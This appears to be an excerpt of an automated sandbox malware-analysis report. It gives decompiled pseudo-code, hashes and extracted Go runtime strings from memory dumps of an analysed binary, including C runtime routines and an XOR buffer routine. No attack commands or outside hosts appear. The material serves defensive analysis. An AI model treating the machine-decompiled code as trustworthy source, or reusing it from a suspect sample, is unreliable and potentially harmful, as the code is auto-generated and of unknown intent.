                                                                                                                            				 *__rax =  *__rax & 0x00000000;
                                                                                                                            				E0000025B25BF8A7B89C(__rax);
                                                                                                                            				 *__rax = 9;
                                                                                                                            				goto 0xf8a8012e;
                                                                                                                            				if (__ecx < 0) goto 0xf8a80116;
                                                                                                                            				_t40 = __edi -  *0xf8aa7384;
                                                                                                                            				if (_t40 >= 0) goto 0xf8a80116;
                                                                                                                            				_t54 = __ecx >> 5;
                                                                                                                            				_t48 = __ecx * 0x58;
                                                                                                                            				if (_t40 == 0) goto 0xf8a80116;
                                                                                                                            				E0000025B25BF8A83FA8(__ebx & 0x0000001f, __edi, _t48, __ecx, _t54);
                                                                                                                            				_t45 =  *((intOrPtr*)(0xf8aa3200 + _t54 * 8));
                                                                                                                            				if (( *(_t45 + _t48 + 8) & 0x00000001) == 0) goto 0xf8a800f5;
                                                                                                                            				r8d = r14d;
                                                                                                                            				E0000025B25BF8A80144(__ebx & 0x0000001f, __edi, _t35, _t37, _t45, _t48, __rdx, _t58, _t59);
                                                                                                                            				goto 0xf8a8010b;
                                                                                                                            				E0000025B25BF8A7B89C(_t45);
                                                                                                                            				 *_t45 = 9;
                                                                                                                            				E0000025B25BF8A7B82C(_t45);
                                                                                                                            				 *_t45 =  *_t45 & 0x00000000;
                                                                                                                            				0xf8a84408();
                                                                                                                            				goto 0xf8a80131;
                                                                                                                            				E0000025B25BF8A7B82C(_t45);
                                                                                                                            				 *_t45 =  *_t45 & 0x00000000;
                                                                                                                            				_t22 = E0000025B25BF8A7B89C(_t45);
                                                                                                                            				 *_t45 = 9;
                                                                                                                            				return E0000025B25BF8A7BEC4(_t22) | 0xffffffff;
                                                                                                                            			}















                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2611593033-0
                                                                                                                            • Opcode ID: 6f54ccc967a67daf497eec524ed76a3fc60e08e7120b96d01ee8ba5a1f37f4bc
                                                                                                                            • Instruction ID: 93c7088478a2e6738f1003e2571999374443521c694ad7b63ce5a680f50956a0
                                                                                                                            • Opcode Fuzzy Hash: 6f54ccc967a67daf497eec524ed76a3fc60e08e7120b96d01ee8ba5a1f37f4bc
                                                                                                                            • Instruction Fuzzy Hash: A1218E73600D4086FF176F25ED493BD6A61E790BB3F294114FA250BAD2CB7888529B3C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 61%
                                                                                                                            			E0000025B25BF8A7F88C(void* __ebx, signed int __ecx, void* __edx, signed int __edi, signed int* __rax, long long __rbx, signed int _a8, long long _a24) {
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __rsi;
                                                                                                                            				void* _t21;
                                                                                                                            				void* _t31;
                                                                                                                            				void* _t38;
                                                                                                                            				signed int* _t43;
                                                                                                                            				signed long long _t48;
                                                                                                                            				signed long long _t50;
                                                                                                                            
                                                                                                                            				_t31 = __edx;
                                                                                                                            				_a24 = __rbx;
                                                                                                                            				_a8 = __ecx;
                                                                                                                            				_t45 = __ecx;
                                                                                                                            				if (__ebx != 0xfffffffe) goto 0xf8a7f8bd;
                                                                                                                            				E0000025B25BF8A7B82C(__rax);
                                                                                                                            				 *__rax =  *__rax & 0x00000000;
                                                                                                                            				E0000025B25BF8A7B89C(__rax);
                                                                                                                            				 *__rax = 9;
                                                                                                                            				goto 0xf8a7f93e;
                                                                                                                            				if (__ecx < 0) goto 0xf8a7f926;
                                                                                                                            				_t38 = __ebx -  *0xf8aa7384;
                                                                                                                            				if (_t38 >= 0) goto 0xf8a7f926;
                                                                                                                            				_t50 = __ecx >> 5;
                                                                                                                            				_t48 = __ecx * 0x58;
                                                                                                                            				if (_t38 == 0) goto 0xf8a7f926;
                                                                                                                            				E0000025B25BF8A83FA8(__ebx, __ebx, __ecx, _t48, _t50);
                                                                                                                            				_t43 =  *((intOrPtr*)(0xf8aa3200 + _t50 * 8));
                                                                                                                            				if (( *(_t43 + _t48 + 8) & 0x00000001) == 0) goto 0xf8a7f90d;
                                                                                                                            				E0000025B25BF8A7F950(__ebx, _t31, __edi & 0x0000001f, _t43, _t45);
                                                                                                                            				goto 0xf8a7f91b;
                                                                                                                            				E0000025B25BF8A7B89C(_t43);
                                                                                                                            				 *_t43 = 9;
                                                                                                                            				0xf8a84408();
                                                                                                                            				goto 0xf8a7f941;
                                                                                                                            				E0000025B25BF8A7B82C(_t43);
                                                                                                                            				 *_t43 =  *_t43 & 0x00000000;
                                                                                                                            				_t21 = E0000025B25BF8A7B89C(_t43);
                                                                                                                            				 *_t43 = 9;
                                                                                                                            				return E0000025B25BF8A7BEC4(_t21) | 0xffffffff;
                                                                                                                            			}












                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4060740672-0
                                                                                                                            • Opcode ID: 5415f8f71c50dd1b57a5a1df961e6f1494d76ea9967bd7bf989da7e7dd621733
                                                                                                                            • Instruction ID: 3cb12f73748af3c3dd65479be977d2e4323f458d0665d66a516e592de477222d
                                                                                                                            • Opcode Fuzzy Hash: 5415f8f71c50dd1b57a5a1df961e6f1494d76ea9967bd7bf989da7e7dd621733
                                                                                                                            • Instruction Fuzzy Hash: AE118933600E40A6FE176F35AD893AC6A50E780773F364624F92907AD6D77888429B3C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            • recovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompar, xrefs: 013308EE
                                                                                                                            • bypassed recovery failedcan't scan our own stackconnection reset by peerdouble traceGCSweepStartfunction not implementedgcDrainN phase incorrectinitSpan: unaligned baselevel 2 not synchronizedlink number out of rangenot supported by windowsout of streams resou, xrefs: 0133092D
                                                                                                                            • panic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g , xrefs: 01330AAA
                                                                                                                            • bad defer entry in panicbypassed recovery failedcan't scan our own stackconnection reset by peerdouble traceGCSweepStartfunction not implementedgcDrainN phase incorrectinitSpan: unaligned baselevel 2 not synchronizedlink number out of rangenot supported by win, xrefs: 0133093E
                                                                                                                            • panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGu, xrefs: 01330954, 013309AA, 01330A6A, 01330AC5
                                                                                                                            • panic on system stackpreempt at unknown pcread-only file systemreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate no, xrefs: 01330AFF
                                                                                                                            • panic during preemptoffprocresize: invalid argreflect.methodValueCallruntime: internal errorruntime: invalid type runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack g, xrefs: 01330A54
                                                                                                                            • panic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not, xrefs: 0133098F
                                                                                                                            • preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCount=, levelBits[level], xrefs: 013309EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: bad defer entry in panicbypassed recovery failedcan't scan our own stackconnection reset by peerdouble traceGCSweepStartfunction not implementedgcDrainN phase incorrectinitSpan: unaligned baselevel 2 not synchronizedlink number out of rangenot supported by win$bypassed recovery failedcan't scan our own stackconnection reset by peerdouble traceGCSweepStartfunction not implementedgcDrainN phase incorrectinitSpan: unaligned baselevel 2 not synchronizedlink number out of rangenot supported by windowsout of streams resou$panic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g $panic during preemptoffprocresize: invalid argreflect.methodValueCallruntime: internal errorruntime: invalid type runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack g$panic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not$panic on system stackpreempt at unknown pcread-only file systemreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate no$panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGu$preempt off reason: 
reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCount=, levelBits[level]$recovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompar
                                                                                                                            • API String ID: 0-2872188254
                                                                                                                            • Opcode ID: 3a0e5aff59c4d4bd72211dd135349bd888fd2b70c46297c803f8eb9969a1b83e
                                                                                                                            • Instruction ID: 0813dc6d5fae0d2207f9385fa81a25c6619847c39c0a3e6bf32782444d2a43ac
                                                                                                                            • Opcode Fuzzy Hash: 3a0e5aff59c4d4bd72211dd135349bd888fd2b70c46297c803f8eb9969a1b83e
                                                                                                                            • Instruction Fuzzy Hash: 08027F72209B85C6EB28EB19E44039E77B5F7D8B98F545122EB8D07B69DF38C085CB44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$malloc$_errno$_callnewh$AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2779598320-0
                                                                                                                            • Opcode ID: e1bff219e582551bd37b6f9105059a019e0bde4c95d5ac3916c1589dc38db4cc
                                                                                                                            • Instruction ID: 2a977c051f3a2638a0267be82752ef58aa703a0fea0dd7c675b9a0a2f8dbc15b
                                                                                                                            • Opcode Fuzzy Hash: e1bff219e582551bd37b6f9105059a019e0bde4c95d5ac3916c1589dc38db4cc
                                                                                                                            • Instruction Fuzzy Hash: 5491EE32319F4C4BDB5A9A5C5C597B973D1EB85311F64025EF48AC36A3DF30DC02469A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 74%
                                                                                                                            			E0000025B25BF8A63A0C(intOrPtr __edx, void* __edi, void* __eflags, long long __rcx, long long __r8) {
                                                                                                                            				void* __rbx;
                                                                                                                            				unsigned int _t48;
                                                                                                                            				void* _t54;
                                                                                                                            				intOrPtr _t70;
                                                                                                                            				void* _t78;
                                                                                                                            				void* _t91;
                                                                                                                            				void* _t92;
                                                                                                                            				void* _t94;
                                                                                                                            				intOrPtr _t96;
                                                                                                                            				void* _t97;
                                                                                                                            				char _t111;
                                                                                                                            				intOrPtr _t113;
                                                                                                                            				void* _t117;
                                                                                                                            				signed long long _t119;
                                                                                                                            				intOrPtr* _t124;
                                                                                                                            				void* _t125;
                                                                                                                            				void* _t131;
                                                                                                                            				void* _t158;
                                                                                                                            				void* _t161;
                                                                                                                            				signed int* _t162;
                                                                                                                            				void* _t164;
                                                                                                                            				void* _t166;
                                                                                                                            				void* _t167;
                                                                                                                            				void* _t181;
                                                                                                                            				int _t183;
                                                                                                                            				int _t185;
                                                                                                                            				signed int* _t186;
                                                                                                                            				int _t188;
                                                                                                                            				signed long long _t189;
                                                                                                                            
                                                                                                                            				_t91 = __edi;
                                                                                                                            				_t117 = _t166;
                                                                                                                            				 *((intOrPtr*)(_t117 + 0x20)) = r9d;
                                                                                                                            				 *((long long*)(_t117 + 0x18)) = __r8;
                                                                                                                            				 *((intOrPtr*)(_t117 + 0x10)) = __edx;
                                                                                                                            				 *((long long*)(_t117 + 8)) = __rcx;
                                                                                                                            				_t167 = _t166 - 0x48;
                                                                                                                            				if (E0000025B25BF8A6351C(__edi) != 0) goto 0xf8a63cc5;
                                                                                                                            				if (E0000025B25BF8A6388C( *(_t167 + 0xc0)) != 0) goto 0xf8a63cc5;
                                                                                                                            				_t119 =  *(_t167 + 0xc8) << 7;
                                                                                                                            				r12d =  *((intOrPtr*)(_t119 + 0x25bf8aa511c));
                                                                                                                            				_t48 =  *(_t167 + 0xb0);
                                                                                                                            				_t78 = _t181 + _t181;
                                                                                                                            				bpl = (_t48 & 0x00000007) != 0;
                                                                                                                            				_t96 = 0 + (_t48 >> 3);
                                                                                                                            				if (_t78 - _t164 - 2 >= 0) goto 0xf8a63cc0;
                                                                                                                            				r13d = 0;
                                                                                                                            				r13d = r13d - _t78;
                                                                                                                            				if (__edx - _t183 - 2 > 0) goto 0xf8a63cc0;
                                                                                                                            				malloc(_t188);
                                                                                                                            				_t162 = _t119;
                                                                                                                            				malloc(_t185);
                                                                                                                            				_t189 = _t119;
                                                                                                                            				_t54 = malloc(_t183);
                                                                                                                            				_t186 = _t119;
                                                                                                                            				if (_t162 == 0) goto 0xf8a63c9f;
                                                                                                                            				if (_t189 == 0) goto 0xf8a63c97;
                                                                                                                            				if (_t119 == 0) goto 0xf8a63c97;
                                                                                                                            				 *((intOrPtr*)(_t167 + 0x30)) = 0;
                                                                                                                            				if ( *((intOrPtr*)(_t167 + 0xa0)) == 0) goto 0xf8a63b0c;
                                                                                                                            				r8d =  *((intOrPtr*)(_t167 + 0xa8));
                                                                                                                            				 *((long long*)(_t167 + 0x20)) = _t167 + 0x30;
                                                                                                                            				goto 0xf8a63b1c;
                                                                                                                            				r8d = 0;
                                                                                                                            				 *((long long*)(_t167 + 0x20)) = _t167 + 0x30;
                                                                                                                            				0xf8a60cbc();
                                                                                                                            				if (_t54 != 0) goto 0xf8a63c7b;
                                                                                                                            				_t70 =  *((intOrPtr*)(_t167 + 0x98));
                                                                                                                            				_t131 = _t162 + _t181;
                                                                                                                            				r13d = r13d - _t70;
                                                                                                                            				r13d = r13d - 2;
                                                                                                                            				r8d = r13d;
                                                                                                                            				E0000025B25BF8A793C0(__edi, 0, __edi, _t97, _t131, _t162, __r8);
                                                                                                                            				 *((char*)(_t131 + _t162)) = 1;
                                                                                                                            				r8d = _t70;
                                                                                                                            				E0000025B25BF8A797B0(_t181 + _t183 + 1, __edi, _t94, _t97, _t131 + _t162,  *((intOrPtr*)(_t167 + 0x90)), __r8);
                                                                                                                            				if ( *((intOrPtr*)(0x25bf8a5f400 + 0x46d38 + ( *(_t167 + 0xc0) +  *(_t167 + 0xc0) * 4 +  *(_t167 + 0xc0) +  *(_t167 + 0xc0) * 4) * 8))() == r12d) goto 0xf8a63ba1;
                                                                                                                            				goto 0xf8a63c7b;
                                                                                                                            				r13d = _t96;
                                                                                                                            				r8d = r12d;
                                                                                                                            				r13d = r13d - r12d;
                                                                                                                            				r13d = r13d - 1;
                                                                                                                            				 *((intOrPtr*)(_t167 + 0x20)) = r13d;
                                                                                                                            				if (E0000025B25BF8A648F0(__edi,  *((intOrPtr*)(0x25bf8a5f400 + 0x46d38 + ( *(_t167 + 0xc0) +  *(_t167 + 0xc0) * 4 +  *(_t167 + 0xc0) +  *(_t167 + 0xc0) * 4) * 8))() - r12d, 0x25bf8a5f400, _t125, _t186, _t189, _t181, _t158) != 0) goto 0xf8a63c7b;
                                                                                                                            				_t111 = r13d;
                                                                                                                            				if (_t111 == 0) goto 0xf8a63be7;
                                                                                                                            				r8d = r13d;
                                                                                                                            				 *_t162 =  *_t162 ^  *(_t189 - _t162 + _t162);
                                                                                                                            				if (_t111 != 0) goto 0xf8a63bda;
                                                                                                                            				r8d = r13d;
                                                                                                                            				 *((intOrPtr*)(_t167 + 0x20)) = r12d;
                                                                                                                            				if (E0000025B25BF8A648F0(_t91, _t111, 0x25bf8a5f400, _t125, _t162, _t189, _t161, _t164) != 0) goto 0xf8a63c7b;
                                                                                                                            				_t113 = r12d;
                                                                                                                            				if (_t113 == 0) goto 0xf8a63c23;
                                                                                                                            				 *_t186 =  *_t186 ^  *(_t189 - _t186 + _t186);
                                                                                                                            				if (_t113 != 0) goto 0xf8a63c16;
                                                                                                                            				_t124 =  *((intOrPtr*)(_t167 + 0xd8));
                                                                                                                            				if ( *_t124 - _t96 >= 0) goto 0xf8a63c38;
                                                                                                                            				 *_t124 = _t96;
                                                                                                                            				goto 0xf8a63c7b;
                                                                                                                            				 *((char*)( *((intOrPtr*)(_t167 + 0xd0)))) = 0;
                                                                                                                            				E0000025B25BF8A797B0(_t91, _t91, _t94, _t97,  *((intOrPtr*)(_t167 + 0xd0)) + 1, _t186, _t181);
                                                                                                                            				_t92 = _t181 + 1;
                                                                                                                            				r8d = r13d;
                                                                                                                            				E0000025B25BF8A797B0(_t92, _t92, _t94, _t97,  *((intOrPtr*)(_t167 + 0xd0)) + 1 +  *((intOrPtr*)(_t167 + 0xd0)), _t162, _t181);
                                                                                                                            				 *((intOrPtr*)( *((intOrPtr*)(_t167 + 0xd8)))) = _t164 - 1 + _t92 - r12d;
                                                                                                                            				free(_t125);
                                                                                                                            				free(??);
                                                                                                                            				free(??);
                                                                                                                            				goto 0xf8a63cc5;
                                                                                                                            				free(??);
                                                                                                                            				if (_t189 == 0) goto 0xf8a63cac;
                                                                                                                            				free(??);
                                                                                                                            				if (_t186 == 0) goto 0xf8a63cb9;
                                                                                                                            				free(??);
                                                                                                                            				goto 0xf8a63cc5;
                                                                                                                            				return 0x16;
                                                                                                                            			}
































                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$malloc$_errno$_callnewh
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4160633307-0
                                                                                                                            • Opcode ID: 145c9b70824bfad6206279638bd8523be3541a49aee38d355e7a59ef029164fd
                                                                                                                            • Instruction ID: 28c6ab8bfcaa0bb357e4f6b147104aba7bc7581ab24aab673f4fe163eb71db08
                                                                                                                            • Opcode Fuzzy Hash: 145c9b70824bfad6206279638bd8523be3541a49aee38d355e7a59ef029164fd
                                                                                                                            • Instruction Fuzzy Hash: 8071E323304F8546EF229B269C487AF77A1F785BD9F245015BE4647F8ADB38C40AC728
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 33%
                                                                                                                            			E01307EA0() {
                                                                                                                            				char _v0;
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				long long _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				long long _v48;
                                                                                                                            				long long _v56;
                                                                                                                            				signed long long _v64;
                                                                                                                            				long long _v72;
                                                                                                                            				long long _v80;
                                                                                                                            				long long _v88;
                                                                                                                            				long long _v96;
                                                                                                                            				long long _v104;
                                                                                                                            				long long _v112;
                                                                                                                            				long long _v120;
                                                                                                                            				long long _v128;
                                                                                                                            				long long _v136;
                                                                                                                            				long long _v144;
                                                                                                                            				char _v152;
                                                                                                                            				long long _v160;
                                                                                                                            				long long _v168;
                                                                                                                            				char _v200;
                                                                                                                            				char _v232;
                                                                                                                            				long long _v240;
                                                                                                                            				signed long long _v248;
                                                                                                                            				long long _v256;
                                                                                                                            				long long _v272;
                                                                                                                            				char _v280;
                                                                                                                            				signed long long _v288;
                                                                                                                            				long long _v312;
                                                                                                                            				void* _t66;
                                                                                                                            				void* _t76;
                                                                                                                            				void* _t86;
                                                                                                                            				void* _t92;
                                                                                                                            				void* _t93;
                                                                                                                            				void* _t94;
                                                                                                                            				void* _t95;
                                                                                                                            				long long _t110;
                                                                                                                            				char* _t112;
                                                                                                                            				signed long long _t113;
                                                                                                                            				long long _t117;
                                                                                                                            				long long _t118;
                                                                                                                            				signed long long _t120;
                                                                                                                            				char* _t127;
                                                                                                                            				long long _t132;
                                                                                                                            				intOrPtr _t134;
                                                                                                                            				long long _t137;
                                                                                                                            				long long _t149;
                                                                                                                            				signed long long _t152;
                                                                                                                            				char _t158;
                                                                                                                            				void* _t160;
                                                                                                                            				long long* _t161;
                                                                                                                            				void* _t163;
                                                                                                                            				void* _t164;
                                                                                                                            				void* _t165;
                                                                                                                            				void* _t167;
                                                                                                                            				void* _t168;
                                                                                                                            				intOrPtr _t170;
                                                                                                                            				void* _t172;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					if( &_v168 <=  *((intOrPtr*)(_t168 + 0x10))) {
                                                                                                                            						L21:
                                                                                                                            						E01356200(_t131, _t158);
                                                                                                                            						continue;
                                                                                                                            					}
                                                                                                                            					_t161 = _t160 - 0x128;
                                                                                                                            					_v8 = _t158;
                                                                                                                            					_t158 =  &_v8;
                                                                                                                            					_t110 = _v0;
                                                                                                                            					E01347BE0(_t66, _t110, _t120, _t158);
                                                                                                                            					E01348360(_t110, _t120, _t158, _t168);
                                                                                                                            					_v168 = _t110;
                                                                                                                            					_v248 = _t120;
                                                                                                                            					 *_t161 = _t110;
                                                                                                                            					_v288 = _t120;
                                                                                                                            					_v280 = 0x28;
                                                                                                                            					E01302320(_t86, 0x31, _t92, _t94, _t131);
                                                                                                                            					asm("inc ebp");
                                                                                                                            					_t170 =  *((intOrPtr*)( *[gs:0x28]));
                                                                                                                            					_t127 = _v272;
                                                                                                                            					if(_t127 < 0) {
                                                                                                                            						L20:
                                                                                                                            						E01345E00(_t86, _t95,  &_v200, 0x1389539, _t127, _v168, _v248, _t158, _t162, _t163, _t167, _t170);
                                                                                                                            						E01330BA0( &_v200, 0x1389539, _t158);
                                                                                                                            						goto L21;
                                                                                                                            					}
                                                                                                                            					_t112 = _t127 - 1;
                                                                                                                            					_t131 = _v248;
                                                                                                                            					if(_t131 < _t112) {
                                                                                                                            						L19:
                                                                                                                            						_t127 = _t112;
                                                                                                                            						L01358900();
                                                                                                                            						goto L20;
                                                                                                                            					}
                                                                                                                            					_t162 = _t127 + 2;
                                                                                                                            					if(_t131 > _t162) {
                                                                                                                            						L5:
                                                                                                                            						if(0 < 0) {
                                                                                                                            							L18:
                                                                                                                            							L01358900();
                                                                                                                            							goto L19;
                                                                                                                            						}
                                                                                                                            						if(_t162 < _t112) {
                                                                                                                            							L17:
                                                                                                                            							L01358980();
                                                                                                                            							goto L18;
                                                                                                                            						}
                                                                                                                            						_t134 = _v168;
                                                                                                                            						r9d =  *(_t127 + _t134 - 1) & 0x000000ff;
                                                                                                                            						r10d =  *(_t127 + _t134) & 0x000000ff;
                                                                                                                            						r10d = r10d << 8;
                                                                                                                            						r9d = r9d | r10d;
                                                                                                                            						if (r9w != 0x282e) goto L4;
                                                                                                                            						r9d =  *(_t127 + _t134 + 1) & 0x000000ff;
                                                                                                                            						if(r9b != 0x2a) {
                                                                                                                            							goto L4;
                                                                                                                            						}
                                                                                                                            						_v256 = _t112;
                                                                                                                            						_t131 = _t131 - _t127;
                                                                                                                            						_v240 = _t131;
                                                                                                                            						_t113 = _t131 - 2;
                                                                                                                            						_v248 = _t113;
                                                                                                                            						_t130 = _t113;
                                                                                                                            						_t117 = ( ~_t113 >> 0x0000003f & _t162) + _t134;
                                                                                                                            						_v160 = _t117;
                                                                                                                            						 *_t161 = _t117;
                                                                                                                            						_v288 = _t113;
                                                                                                                            						_v280 = 0x29;
                                                                                                                            						_t76 = E01302320(_t86, 0x31, _t92, _t94, _t131);
                                                                                                                            						asm("inc ebp");
                                                                                                                            						_t170 =  *((intOrPtr*)( *[gs:0x28]));
                                                                                                                            						_t118 = _v272;
                                                                                                                            						asm("o16 nop [eax+eax]");
                                                                                                                            						if(_t118 >= 0) {
                                                                                                                            							_t130 = _t118 + 2;
                                                                                                                            							_t131 = _v248;
                                                                                                                            							if(_t130 >= _v248) {
                                                                                                                            								E01345E00(_t86, _t95, _t118, 0x138e1bc, _t130, _v160, _t131, _t158, _t162, _t163, _t167, _t170);
                                                                                                                            								_t76 = E01330BA0(_t118, 0x138e1bc, _t158);
                                                                                                                            							}
                                                                                                                            							asm("o16 nop [eax+eax]");
                                                                                                                            							if(0 <= 0) {
                                                                                                                            								if(_t118 <= _t130) {
                                                                                                                            									_t137 = _v160;
                                                                                                                            									r8d =  *(_t137 + _t118) & 0x0000ffff;
                                                                                                                            									if (r8w != 0x2e29) goto L10;
                                                                                                                            									_t132 = _t137;
                                                                                                                            									asm("o16 nop [eax+eax]");
                                                                                                                            									_v312 = _t158;
                                                                                                                            									E01358B39(_t76,  &_v152 - 0x30);
                                                                                                                            									_t158 = _v0;
                                                                                                                            									_v152 = 0x138804e;
                                                                                                                            									_v144 = 0xd;
                                                                                                                            									_v136 = _v168;
                                                                                                                            									_v128 = _v256;
                                                                                                                            									_t149 = "./0:<=?CLMPSZ[\\";
                                                                                                                            									_v120 = _t149;
                                                                                                                            									_v112 = 1;
                                                                                                                            									_v104 = _t132;
                                                                                                                            									_v96 = _t118;
                                                                                                                            									_v88 = _t149;
                                                                                                                            									_v80 = 1;
                                                                                                                            									_t152 = _v240 - _t118 + 0xfffffffc;
                                                                                                                            									_t162 = _t152;
                                                                                                                            									_v72 = ( ~_t152 >> 0x0000003f & _t130) + _t132;
                                                                                                                            									_v64 = _t152;
                                                                                                                            									_v56 = 0x13890c5;
                                                                                                                            									_v48 = 0x13;
                                                                                                                            									_v40 = _t132;
                                                                                                                            									_v32 = _t118;
                                                                                                                            									_t131 = 0x1386f85;
                                                                                                                            									_v24 = 0x1386f85;
                                                                                                                            									_v16 = 8;
                                                                                                                            									E01309100(E01345B60(_t86, 9, _t92, _t95, _t118,  &_v152, _t130, _t130, 0x13890c5, _t158, _t152, _t163, _t167, _t170), _t118,  &_v152, _t158, _t170);
                                                                                                                            									E01330420(_t93, _t95, 0x137b620, _t118, _t158, _t164, _t165, _t167, _t170, _t172);
                                                                                                                            								}
                                                                                                                            								L01358980();
                                                                                                                            							}
                                                                                                                            							L01358900();
                                                                                                                            						}
                                                                                                                            						_t112 =  &_v232;
                                                                                                                            						E01345E00(_t86, _t95, _t112, 0x138954c, _t130, _v160, _v248, _t158, _t162, _t163, _t167, _t170);
                                                                                                                            						E01330BA0(_t112, 0x138954c, _t158);
                                                                                                                            						goto L17;
                                                                                                                            					}
                                                                                                                            					L4:
                                                                                                                            					E01345E00(_t86, _t95, _t112, 0x138e6e5, _t127, _v168, _t131, _t158, _t162, _t163, _t167, _t170);
                                                                                                                            					E01330BA0(_t112, 0x138e6e5, _t158);
                                                                                                                            					goto L5;
                                                                                                                            				}
                                                                                                                            			}

                                                                                                                            Strings
                                                                                                                            • value method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker in, xrefs: 01308093
                                                                                                                            • ), xrefs: 01307FD4
